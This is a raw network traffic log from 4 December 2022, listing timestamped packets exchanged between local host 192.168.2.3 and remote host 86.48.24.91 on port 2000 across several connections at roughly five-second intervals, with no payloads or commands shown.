Dec 4, 2022 22:27:14.165441036 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.175295115 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.176512957 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.187679052 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.188963890 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.200750113 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.202434063 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.211338997 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.218727112 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.220052004 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.220637083 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.294450998 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.294617891 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.307491064 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.324420929 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.331430912 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.345416069 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.362649918 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.363169909 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.238070965 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.248615980 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.249119997 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.249660015 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.257760048 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.260226011 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.266540051 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.271765947 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.273175001 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.273624897 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.281367064 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.281958103 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.289529085 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.290649891 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.298583984 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.299691916 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:19.395108938 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.395690918 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.402354002 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.418467045 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.419164896 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.430578947 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.434257984 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:19.442122936 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.313739061 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.320661068 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.336627960 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.337310076 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.345719099 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.346360922 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.353976965 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.356646061 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.362978935 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.363562107 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.372842073 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.373461962 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.383579016 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.399096012 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.416466951 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.417001963 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:24.464483023 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.480159998 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.491084099 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.504194021 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.507174969 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.516323090 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.559360027 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:24.559412003 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.409233093 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.418154001 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.438379049 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.439805031 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.447151899 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.448262930 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.456454992 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.457968950 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.465066910 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.466471910 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.470772028 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.472168922 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.476388931 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.477188110 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.484114885 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.484849930 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:29.561153889 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.582056046 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.591022968 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.601118088 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.611038923 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.614943027 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.619019032 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:29.628514051 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.491985083 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.497231960 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.504757881 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.507637978 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.517509937 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.519531965 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.527636051 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.537753105 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.538336039 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.543493032 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.547334909 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.547875881 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.555947065 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.556427956 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.564753056 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.567747116 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:34.641246080 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.649880886 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.663834095 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.681948900 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.687170982 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.689771891 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.699889898 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:34.711191893 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.573437929 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.575534105 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.590770960 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.591911077 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.607229948 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.607944965 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.625312090 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.625792027 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.642465115 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.645911932 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.655656099 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.658580065 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.669692039 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.670502901 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.682833910 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.683423996 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:39.718408108 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.734205008 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.751049995 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.769829988 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.789292097 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.800960064 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.813157082 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:39.827348948 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.697549105 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.708116055 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.708983898 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.709760904 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.717977047 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.724198103 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.729748964 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.732222080 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.747406960 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.747865915 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.761080027 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.761696100 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.770402908 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.771028996 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.786365986 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.789668083 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:44.851443052 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.854053020 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.866579056 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.876039028 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.892642021 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.904643059 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.913032055 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:44.931622982 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.798233032 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.811184883 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.815432072 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.818720102 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.834590912 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.839476109 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.851041079 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.852319002 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.866285086 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.867588997 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.882950068 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.884165049 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.897100925 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.898678064 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.911118031 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.913331985 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:49.955461979 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.961553097 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.982810020 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:49.994692087 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:50.009836912 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:50.026583910 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:50.047360897 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:50.056747913 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:54.931590080 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:54.944437027 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:54.945462942 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:54.945566893 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:54.961090088 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:54.962330103 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:54.984040022 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:54.988104105 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:54.998357058 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.004053116 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:55.012219906 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.013861895 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:55.023710012 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.028034925 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.028115034 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:55.028732061 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:55.088078022 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.088239908 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.105458021 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.130590916 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.147598028 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.156498909 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.171960115 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:55.172028065 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.032679081 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.066483974 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.077486038 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.083580017 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:00.097798109 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.107585907 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:00.110018969 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.119523048 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:00.123749018 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.143598080 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:00.150094986 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.152549982 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:00.158555984 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:00.164634943 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:00.200614929 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:00.283540010 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.127451897 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.127871990 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.129231930 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.129981995 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.130467892 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.132711887 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.133383989 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.134202003 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:01.270400047 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:01.271436930 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:01.271466970 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:01.273122072 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:01.273149014 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:01.275274992 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:01.275674105 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:01.281678915 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.167366982 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.178674936 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.183940887 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.188121080 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.195415020 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.196114063 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.204494953 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.206274986 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.223551989 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.224152088 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.233273983 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.236186028 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.243490934 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.246165037 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.251768112 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.255625963 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:05.322439909 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.332484961 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.339231014 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.348261118 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.367412090 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.379220009 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.389286041 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:05.398247004 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.261871099 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.271408081 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.277549982 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.277873039 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.288060904 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.288407087 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.300491095 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.300904989 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.312695980 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.312966108 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.324084044 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.324409962 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.337204933 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.337762117 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.349472046 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.349740028 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:10.415174007 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.420130968 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.436369896 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.444051027 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.455344915 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.467101097 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.480278015 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:10.493057966 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.367940903 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.375041962 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.379865885 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.380580902 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.401374102 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.402004004 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.411201000 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.411550999 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.419774055 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.420272112 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.426450014 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.427290916 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.434765100 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.436386108 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.447767973 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.448040009 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:15.517059088 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.522890091 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.544987917 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.554032087 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.565538883 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.570331097 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.577994108 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:15.591010094 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.459330082 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.473141909 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.477942944 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.478334904 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.490041018 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.494342089 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.507363081 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.509103060 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.522454023 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.524458885 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.535546064 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.536318064 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.549942970 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.550316095 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.564479113 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.569183111 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:20.615978956 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.620826960 CET	2000	49709	86.48.24.91	192.168.2.3
